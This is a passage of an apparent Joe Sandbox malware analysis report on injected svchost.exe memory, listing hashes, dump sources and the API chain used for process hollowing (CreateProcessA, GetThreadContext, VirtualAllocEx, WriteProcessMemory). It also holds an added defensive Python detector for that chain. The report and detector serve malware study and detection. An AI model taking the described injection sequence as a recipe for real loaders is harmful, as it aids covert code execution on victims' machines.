                                • Opcode Fuzzy Hash: 22773a5583e582e6cf353a3d814a5d221b4d5c6322f23d4d0396b14cffe3e18e
                                • Instruction Fuzzy Hash: 63118C30200B014B8714EB68E48485AB7A7FFC1628364CEADD15A8B255DF71A94B8B94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c17c8a54a443c1f53c6873530dbd3139860aa071b7e7063a70b00618b80b0aaf
                                • Instruction ID: 546e249c1e7b94cd07624e6632d0e83b3f174f0e828e576bea68c87fd7182d05
                                • Opcode Fuzzy Hash: c17c8a54a443c1f53c6873530dbd3139860aa071b7e7063a70b00618b80b0aaf
                                • Instruction Fuzzy Hash: 4001843D34012467E60512A9AD11BBE215FD788B14F10405DE605EEBC5CEFE5C061792
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cf9a0c4a889fba39c6f74984584a0927c5428e46690d827655d81c3d33d79c7e
                                • Instruction ID: 4a7b69b35c03e40f113a7d163e2a32e0584853e65d94c111c9eed333371d4cc5
                                • Opcode Fuzzy Hash: cf9a0c4a889fba39c6f74984584a0927c5428e46690d827655d81c3d33d79c7e
                                • Instruction Fuzzy Hash: 80F02877B053266BEB1048879854BBF7A5BEBD4661F494029FE0682244D526CC56F3A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2b0d93deba6d3ff8f7006ac92e47fa14dd568e1290b360c3ca5b21706115942c
                                • Instruction ID: cd3deca02cbc8f275ee963cd399868801ec1442b1f656dfe1835dd70e2d8f0b5
                                • Opcode Fuzzy Hash: 2b0d93deba6d3ff8f7006ac92e47fa14dd568e1290b360c3ca5b21706115942c
                                • Instruction Fuzzy Hash: 45F0AF3D34012467EA0826A9AD11BBE316FEB88F04F10805DE605BEBC9CEFF6C051796
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cd8c52ad1d618155d62a7f3cf6aa5df6632a38e0b1aa08b20f815615964f6711
                                • Instruction ID: 8ef99a2899d9d836ae2cffa7c7bed74b5033a2657f500cf77e1236313de644ae
                                • Opcode Fuzzy Hash: cd8c52ad1d618155d62a7f3cf6aa5df6632a38e0b1aa08b20f815615964f6711
                                • Instruction Fuzzy Hash: 66F09EB3F083B05BEB110AD46C445393F57FAE25A0349455AED06C7114D631CC17F390
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7a1d6dfa5f07703258e1f6ffcd4eaa401b6f6914be43863a90da2db5c76a949f
                                • Instruction ID: 0aa216043bcafbc3d2e7e8cc2999090a6b6b7369b7a1a517ce1ece48ad4d1ccb
                                • Opcode Fuzzy Hash: 7a1d6dfa5f07703258e1f6ffcd4eaa401b6f6914be43863a90da2db5c76a949f
                                • Instruction Fuzzy Hash: 59F0BE312045109FC725DB2AE484AB977E9EF89618F1550B9D50ACF3E2CF26CC468B91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b2ed45ac108957b3ac00e26bfe4d40367bddaff9c9359dfb9128a46ab03797a8
                                • Instruction ID: 82576e6a3ac1b9daebff0ac23331621428312183cdd608794e2968fa6017f790
                                • Opcode Fuzzy Hash: b2ed45ac108957b3ac00e26bfe4d40367bddaff9c9359dfb9128a46ab03797a8
                                • Instruction Fuzzy Hash: 93E026303402205FC710EB79D804F7977E99F8CA20F1480A9FA4ACB3E1EA20AC41CB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 488b7061a993d1a6a3265a333fba16e1cd8cddf045bd36018731a91fe9b966cd
                                • Instruction ID: 4c0cbcef1d9b0a0569be183d842d2d6b7ce1372bf366c0152fb3d63c0b8fe1e9
                                • Opcode Fuzzy Hash: 488b7061a993d1a6a3265a333fba16e1cd8cddf045bd36018731a91fe9b966cd
                                • Instruction Fuzzy Hash: F4E04F3094924DAFCB50EF68E90259DBBB9EF06614B1044EDD80CD7262EA356E099B92
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3e2ee11105c03ec0d668f086527a77152386c8de133bcad028498de07b7d1fb9
                                • Instruction ID: 863a6fb95827a107c197e480fb69133a613e145cefe1c3cff530ce43bc04328a
                                • Opcode Fuzzy Hash: 3e2ee11105c03ec0d668f086527a77152386c8de133bcad028498de07b7d1fb9
                                • Instruction Fuzzy Hash: 3AE0C2353841544FD7468B68E842B2937A9EB48724F5040B9ED09CF3E2CF39EC428E51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f981774fade76aa8508cae10562dc3b4a7b8e5b6b4fec48758a06d6c9b141bc0
                                • Instruction ID: 42516659145d24d6277515009e8ea56331bc8ece2c3917651b534f35eecdf2c5
                                • Opcode Fuzzy Hash: f981774fade76aa8508cae10562dc3b4a7b8e5b6b4fec48758a06d6c9b141bc0
                                • Instruction Fuzzy Hash: B1E09274E04208AFCB44EFA9E44559DBBF5AB48218F0185A9A909E7350EA746A448F81
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ab67a5dfd7230d0c89dfd7d7bf39540a8cb8388a3e8bf6beb59b6c0e99f1f199
                                • Instruction ID: 89e539735df869431e7222cb2f29cbf3314955c1cc7492a8f81f014a8f75fc47
                                • Opcode Fuzzy Hash: ab67a5dfd7230d0c89dfd7d7bf39540a8cb8388a3e8bf6beb59b6c0e99f1f199
                                • Instruction Fuzzy Hash: A1D0C9327511244F8708EBADE454C6973EEAF8D66531140FAE50ACB371DE65EC41CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 98532493363e31c368083adb66561c2066f562a4aa93b0d1be965a1f33da60ad
                                • Instruction ID: c7817bd4c3dd9e443cd00205bc079248bfd7f6b677d61c6c9fcb66f916b78bdf
                                • Opcode Fuzzy Hash: 98532493363e31c368083adb66561c2066f562a4aa93b0d1be965a1f33da60ad
                                • Instruction Fuzzy Hash: C8D05E70A0510DEF8B80EFA8EA014ADF7F9EF45214B2084ACD80CD7354EA316F099B81
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 403f199c1c739b0f4da0f4f55b6866fc934a533b3646d8cff5e36cb37421fadb
                                • Instruction ID: 80fa7952096d2cafb816b8ba651600e6e85bf3b8357e79a8b18707b673d75c4a
                                • Opcode Fuzzy Hash: 403f199c1c739b0f4da0f4f55b6866fc934a533b3646d8cff5e36cb37421fadb
                                • Instruction Fuzzy Hash: C5D05E342401448F87549B69E04482633AAEB8C6247109099ED098B3A5CE31EC418E51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ede2dac6b7ec9e734b6bc31f361794dd467946c2dda85d2adcd0bc6a4dc292fc
                                • Instruction ID: 6ac4bdafd716daed8047b64eac5fdedeb33da0a93e85652f621238152322536a
                                • Opcode Fuzzy Hash: ede2dac6b7ec9e734b6bc31f361794dd467946c2dda85d2adcd0bc6a4dc292fc
                                • Instruction Fuzzy Hash: 3BC08C31AC832A4BEF067274F80A3DCF3889B50639F404136A819C3382EF6CD00B4680
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 054339d86bcc8ddc7055ed3ffa8979d43d3b4db315d076aad8baedf3b895226e
                                • Instruction ID: 9d7f6caa3995c045baf81117a0c16e5ba3a3906771641ece32c80aacf67b32f9
                                • Opcode Fuzzy Hash: 054339d86bcc8ddc7055ed3ffa8979d43d3b4db315d076aad8baedf3b895226e
                                • Instruction Fuzzy Hash: 30B0927090930CAF8610DAA9980191AB7ACDA0A118B0206D9EA0887310DA72AD105AD2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 57fef67ff2943802b369e9407cc717f03d88eaa5c334d7d0bab2ae4c2922c9ea
                                • Instruction ID: 254fb5f018106ca216b5439a5903964575e109b84c4b78c4bda23d50d690922e
                                • Opcode Fuzzy Hash: 57fef67ff2943802b369e9407cc717f03d88eaa5c334d7d0bab2ae4c2922c9ea
                                • Instruction Fuzzy Hash: 8BB0123000570D8F8680BBE2F406D543B1CD54071DB844950E10C490329E646985C6C9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000020.00000002.782014661.0000000005920000.00000040.00000001.sdmp, Offset: 05920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_32_2_5920000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3ed556ac7be174996c2a828a2a520ec1a12cc5b27998a8b4d497d6f0e975a945
                                • Instruction ID: 4fface8932d0a11305c731303e16b337fab1e18bbf0dd073371e91c83f90f967
                                • Opcode Fuzzy Hash: 3ed556ac7be174996c2a828a2a520ec1a12cc5b27998a8b4d497d6f0e975a945
                                • Instruction Fuzzy Hash: CEB0123104560D5B8640ABE2F60655C3B1C954461CB908550E30C894165F683D1486CC
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Execution Graph

                                Execution Coverage:11.6%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:361
                                Total number of Limit Nodes:18

                                Graph

                                 [Execution graph rendered as an image in the original report; the flattened node listing is not reproduced. Recoverable call information: functions at 0878xxxx in svchost.exe (process 36) resolve imports through GetModuleHandleW and LoadLibraryExW and reach CreateWindowExW, CallWindowProcW, DuplicateHandle and VirtualProtect; functions at 057Axxxx in the same process reach PostMessageW and, in order, CreateProcessA, GetThreadContext, VirtualAllocEx and WriteProcessMemory, the API chain a remote process-injection (hollowing) loader runs against a child it has just spawned.]
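The execution graph reduces, per process, to an ordered chain of API calls, and that order is what a detector should key on rather than any single call. The following Python script is an added example, not part of the Joe Sandbox report: it scans a constructed API-call trace (modelled on the APIs named in the graph, with PID 36 standing in for the svchost.exe snapshot) and flags any process whose calls contain CreateProcessA, GetThreadContext, VirtualAllocEx and WriteProcessMemory in that order. The trace, the PIDs and the image names are constructed, not sandbox output.

```python
"""Flag the remote-process-injection API chain in a per-process API trace.

Added example. SAMPLE_TRACE is constructed to mirror the APIs named in the
execution graph; it is not Joe Sandbox output.
"""
from collections import defaultdict

# Ordered chain an injection/hollowing loader runs after spawning its victim.
# SetThreadContext/ResumeThread are deliberately not required: the sandbox
# graph stops at WriteProcessMemory, and a detector that waits for the final
# step misses loaders that are killed or crash before resuming the thread.
INJECTION_CHAIN = (
    "CreateProcessA",
    "GetThreadContext",
    "VirtualAllocEx",
    "WriteProcessMemory",
)

# Constructed trace of (pid, image, api) events. PID 36 mirrors the svchost.exe
# snapshot in the report; PID 40 is a benign launcher that spawns a child but
# never touches its memory and must not be flagged.
SAMPLE_TRACE = [
    (36, "svchost.exe", "GetModuleHandleW"),
    (36, "svchost.exe", "CreateProcessA"),
    (40, "explorer.exe", "CreateProcessA"),
    (36, "svchost.exe", "GetThreadContext"),
    (36, "svchost.exe", "VirtualAllocEx"),
    (40, "explorer.exe", "DuplicateHandle"),
    (36, "svchost.exe", "WriteProcessMemory"),
    (36, "svchost.exe", "PostMessageW"),
]


def match_chain(calls, chain=INJECTION_CHAIN):
    """Return True if every API in `chain` occurs in `calls` in chain order.

    Unrelated calls may be interleaved; the order of the chain itself must
    be preserved, so the same APIs in a different order do not match.
    """
    idx = 0
    for api in calls:
        if api == chain[idx]:
            idx += 1
            if idx == len(chain):
                return True
    return False


def find_injectors(trace, chain=INJECTION_CHAIN):
    """Group a (pid, image, api) trace by PID and return [(pid, image)] for
    every process whose call order contains the injection chain."""
    per_pid = defaultdict(list)
    images = {}
    for pid, image, api in trace:
        per_pid[pid].append(api)
        images[pid] = image
    return [(pid, images[pid]) for pid in sorted(per_pid)
            if match_chain(per_pid[pid], chain)]


if __name__ == "__main__":
    for pid, image in find_injectors(SAMPLE_TRACE):
        print(f"pid {pid} ({image}): process-injection API chain observed")
```

The match is a subsequence check per PID, so calls from other threads of the same process interleaved with the chain do not break it, while a process that merely spawns a child (PID 40 above) is left alone. Tune the chain to the trace source you have: on a sandbox that records the target handle, requiring VirtualAllocEx and WriteProcessMemory to name the handle returned by CreateProcessA removes the remaining false positives.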

                                Executed Functions

                                Control-flow Graph

                                 [Graph image (executed / not-executed block colouring) not reproduced. Function 57a66fc: basic blocks 57a66fc through 57a6a4d; CreateProcessA is called from block 57a6897-57a6951, followed by blocks 57a6953-57a6959 and 57a695a-57a69e0.]
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 057A693E
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.843472762.00000000057A0000.00000040.00000001.sdmp, Offset: 057A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_57a0000_svchost.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID: Ea`$Ea`
                                • API String ID: 963392458-3464468828
                                • Opcode ID: 5c91b3dcc5dc11742eb009fc8f8ad7b5bab44e7ce063d3e8bf32361317692bd2
                                • Instruction ID: df4cc923568cd2b5b3ed4a71e42ec44da5580934ce77f53710cdf9905c1faa20
                                • Opcode Fuzzy Hash: 5c91b3dcc5dc11742eb009fc8f8ad7b5bab44e7ce063d3e8bf32361317692bd2
                                • Instruction Fuzzy Hash: C7A18072D04219CFDF10CF68C845BEEBBB2BF88304F188669E819A7240DB759985DF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                 [Graph image (executed / not-executed block colouring) not reproduced. Function 57a6708: basic blocks 57a6708 through 57a6a4d; CreateProcessA is called from block 57a6897-57a6951, followed by blocks 57a6953-57a6959 and 57a695a-57a69e0.]
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 057A693E
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.843472762.00000000057A0000.00000040.00000001.sdmp, Offset: 057A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_57a0000_svchost.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID: Ea`$Ea`
                                • API String ID: 963392458-3464468828
                                • Opcode ID: 1f6662bb0a102892c9305603e38475fdca9fd2fd3703baee604d800a843726db
                                • Instruction ID: 3c4bca0485a6e9bfa930850614028fea995e700e6ab712308ed2b7d1ea9466bf
                                • Opcode Fuzzy Hash: 1f6662bb0a102892c9305603e38475fdca9fd2fd3703baee604d800a843726db
                                • Instruction Fuzzy Hash: 12918E72D04219CFDF10CF68C845BEEBBB6BF88314F188669E819A7240DB749985DF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                 [Graph image (executed / not-executed block colouring) not reproduced. Function 8788cc8: basic blocks 8788cc8 through 8788ec9; block 8788d04-8788d38 calls 8788224, and CreateWindowExW is called from block 8788ddb-8788e7a.]
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.855188481.0000000008780000.00000040.00000010.sdmp, Offset: 08780000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_8780000_svchost.jbxd
                                Similarity
                                • API ID:
                                • String ID: Ea`$Ea`
                                • API String ID: 0-3464468828
                                • Opcode ID: 2661694b402974f2ea0575855022ed0abd9cd9d8d12ce4f06cef843e2daa0139
                                • Instruction ID: da309ee4500c75b771e1d1d6048da18ce4db3901d322153a15fa97cee7cdc33e
                                • Opcode Fuzzy Hash: 2661694b402974f2ea0575855022ed0abd9cd9d8d12ce4f06cef843e2daa0139
                                • Instruction Fuzzy Hash: A87144B1844388EFCB12DFA9C840ADDBFB1BF49310F5581AAE804AB226C7719855DF61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                 [Graph image (executed / not-executed block colouring) not reproduced. Function 8788224: basic blocks 8788224-8788d60 through 8788ec9; block 8788d04-8788d38 calls 8788224 itself, and CreateWindowExW is called from block 8788ddb-8788e7a.]
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 08788E6A
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.855188481.0000000008780000.00000040.00000010.sdmp, Offset: 08780000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_8780000_svchost.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID: Ea`$Ea`
                                • API String ID: 716092398-3464468828
                                • Opcode ID: 7a9bb6ebd219768f8220c02abc0da8225d0d903596379e411d591db6cdb5a119
                                • Instruction ID: 26d8d403536c5bac35b01f41cb8509c2dd009c20e768cc18ae14aab6dafb2378
                                • Opcode Fuzzy Hash: 7a9bb6ebd219768f8220c02abc0da8225d0d903596379e411d591db6cdb5a119
                                • Instruction Fuzzy Hash: FF51C0B1D00309DFDB14DF99C884ADEBBB5BF48314F64822AE819AB214D7759885CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                 [Graph image (executed / not-executed block colouring) not reproduced. Function 87868b0: basic blocks 87868b0 through 8786b20; calls 878579c, 8786b38 or 8786b29, 87857a8, 8780d2c, 87855e8, 87857b8 and 8786df8 or 8786de8; GetModuleHandleW is called from block 8786ad8-8786b03.]
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.855188481.0000000008780000.00000040.00000010.sdmp, Offset: 08780000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_8780000_svchost.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID: Ea`
                                • API String ID: 4139908857-4245709379
                                • Opcode ID: dfeaf3a73827820151ba34497c92f84a6c74ced6e2297ef4628a5aa30442c088
                                • Instruction ID: 9f5525e4dfbd496612a52737652c50ac12dd7f25f4b11cecd509da9d3e97b427
                                • Opcode Fuzzy Hash: dfeaf3a73827820151ba34497c92f84a6c74ced6e2297ef4628a5aa30442c088
                                • Instruction Fuzzy Hash: 79714570A00B05DFD764EF2AD04875ABBF1BF98205F14892ED18AD7B44DB75E8068BA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                 [Graph image (executed / not-executed block colouring) not reproduced. Function 8788374: basic blocks 8788374-878b33c through 878b40f-878b41c; block 878b3ec-878b40c calls 878824c, and CallWindowProcW is called from block 878b39a-878b3d2.]
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 0878B3C1
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.855188481.0000000008780000.00000040.00000010.sdmp, Offset: 08780000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_8780000_svchost.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID: Ea`
                                • API String ID: 2714655100-4245709379
                                • Opcode ID: 52ed3761ffe2c563c0e8d2e278b2a647836cf257862a6e97a22a52a189d093a9
                                • Instruction ID: 2df1e41744ae5a9f030e5249d074df03f18e5c4f638977b0aea5b1b2dc650466
                                • Opcode Fuzzy Hash: 52ed3761ffe2c563c0e8d2e278b2a647836cf257862a6e97a22a52a189d093a9
                                • Instruction Fuzzy Hash: 944157B8A00605CFCB54DF99C488AAABBF5FF88325F24C459D519AB721D774A841CFA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                 [Graph image (executed / not-executed block colouring) not reproduced. Function 57a6c40: basic blocks 57a6c40 through 57a6d1e; WriteProcessMemory is called from block 57a6ca6-57a6ce5.]
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 057A6CD8
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.843472762.00000000057A0000.00000040.00000001.sdmp, Offset: 057A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_57a0000_svchost.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID: Ea`
                                • API String ID: 3559483778-4245709379
                                • Opcode ID: 335810c06ef5db16c80c00adf1a8dddc44ed21c4805bfd628555f422e9083a2e
                                • Instruction ID: 2f720a183fb4cfd0939dadc4563e928b6a2950b70b4c910781a7a10e2db1fb90
                                • Opcode Fuzzy Hash: 335810c06ef5db16c80c00adf1a8dddc44ed21c4805bfd628555f422e9083a2e
                                • Instruction Fuzzy Hash: 35214871D002498FDF40CFA9D884BEEBBF1FF88314F14842AE519A7240C778A955DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                 [Graph image (executed / not-executed block colouring) not reproduced. Function 57a6c48: basic blocks 57a6c48 through 57a6d1e; WriteProcessMemory is called from block 57a6ca6-57a6ce5.]
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 057A6CD8
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.843472762.00000000057A0000.00000040.00000001.sdmp, Offset: 057A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_57a0000_svchost.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID: Ea`
                                • API String ID: 3559483778-4245709379
                                • Opcode ID: 9329fdeeb1a636ded02be52e39cff7c2a37059dfc643c32537b3f9194e2856a7
                                • Instruction ID: af0ad1b098266d17d10b8efbcfe965930111940eb4dea413e94e2571bf2a5712
                                • Opcode Fuzzy Hash: 9329fdeeb1a636ded02be52e39cff7c2a37059dfc643c32537b3f9194e2856a7
                                • Instruction Fuzzy Hash: 732148719003099FDB00CFA9C884BDEBBF5FF48314F148429E919A7240CB78A954DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                 [Graph image (executed / not-executed block colouring) not reproduced. Function 878009c: basic blocks 878009c-8780544 (DuplicateHandle call), 8780546-878054c and 878054d-878056a.]
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,08780476,?,?,?,?,?), ref: 08780537
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.855188481.0000000008780000.00000040.00000010.sdmp, Offset: 08780000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_8780000_svchost.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID: Ea`
                                • API String ID: 3793708945-4245709379
                                • Opcode ID: 4d2288494cb968d617863856f2ed1b2544a5e2dcb3840adb98ab4c53b8d0d7f0
                                • Instruction ID: 139dc2cf37e19284ebb1a3c8e486d8bbb0806dcac49f2bb0f65528afdd8129cd
                                • Opcode Fuzzy Hash: 4d2288494cb968d617863856f2ed1b2544a5e2dcb3840adb98ab4c53b8d0d7f0
                                • Instruction Fuzzy Hash: 4E21E6B5904648DFDB10CF99D484BDEBBF4EB48314F14845AE915B3310D778A954CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph
                                • Nodes: 275 = 57a6a89-57a6adb; 277 = 57a6aeb-57a6b1b (GetThreadContext); 278 = 57a6add-57a6ae9; 280 = 57a6b1d-57a6b23; 281 = 57a6b24-57a6b54
                                • Edges: 275->277, 275->278, 277->280, 277->281, 278->277, 280->281
                                APIs
                                • GetThreadContext.KERNELBASE(?,00000000), ref: 057A6B0E
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.843472762.00000000057A0000.00000040.00000001.sdmp, Offset: 057A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_57a0000_svchost.jbxd
                                Similarity
                                • API ID: ContextThread
                                • String ID: Ea`
                                • API String ID: 1591575202-4245709379
                                • Opcode ID: 1e6da524a233b18354d1eb6a815069bf181675cac0236c354ba2666d0651a84d
                                • Instruction ID: a33703db3b087f5be2c141b8a2c4ff47a9faf070648004433f7d0bdbfa3b6984
                                • Opcode Fuzzy Hash: 1e6da524a233b18354d1eb6a815069bf181675cac0236c354ba2666d0651a84d
                                • Instruction Fuzzy Hash: C32138B1D042098FDB50CFAAD4847EEBBF1AF88314F28842AD419A7740CB789945CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph
                                • Nodes: 285 = 87804a8-8780544 (DuplicateHandle); 286 = 878054d-878056a; 287 = 8780546-878054c
                                • Edges: 285->286, 285->287, 287->286
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,08780476,?,?,?,?,?), ref: 08780537
                                Strings
                                Memory Dump Source
                                • Source File: 00000024.00000002.855188481.0000000008780000.00000040.00000010.sdmp, Offset: 08780000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_36_2_8780000_svchost.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID: Ea`
                                • API String ID: 3793708945-4245709379
                                • Opcode ID: 851e6bfb03b4b24d5ba5e6af768a0c6a9dfb02a202c837f2c8c4befecf35ce2f
                                • Instruction ID: d72005848c3d52cb04cf82aa2271ad4329d859097b7aaf5cf2666e039b0b4076
                                • Opcode Fuzzy Hash: 851e6bfb03b4b24d5ba5e6af768a0c6a9dfb02a202c837f2c8c4befecf35ce2f
                                • Instruction Fuzzy Hash: FC2114B5901248DFDB10CFA9D984ADEBFF4EB48320F14801AE914A7311D778A954CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph
                                • Nodes: 290 = 57a6a90-57a6adb; 292 = 57a6aeb-57a6b1b (GetThreadContext); 293 = 57a6add-57a6ae9; 295 = 57a6b1d-57a6b23; 296 = 57a6b24-57a6b54
